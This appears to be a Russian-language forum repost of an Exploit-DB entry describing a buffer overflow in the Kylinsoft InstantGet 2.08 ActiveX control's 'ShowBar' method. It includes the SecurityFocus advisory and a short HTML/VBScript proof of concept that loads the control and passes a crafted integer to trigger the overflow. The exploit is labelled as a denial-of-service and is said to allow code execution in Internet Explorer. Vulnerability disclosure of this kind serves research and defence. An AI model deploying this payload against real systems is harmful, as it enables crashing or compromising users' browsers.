Exploit Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34442
Проверка EDB
  1. Пройдено
Автор
THE_EDIT0R
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-09-19
Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow
HTML:
source: https://www.securityfocus.com/bid/42418/info

Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.

Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.

<object classid=&#039;clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510&#039; id=&#039;target&#039; />

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#039;vbscript&#039;>

arg1=-2147483647

target.ShowBar arg1 

</script>
</span></span>
</code></pre>
 
Источник
www.exploit-db.com

Похожие темы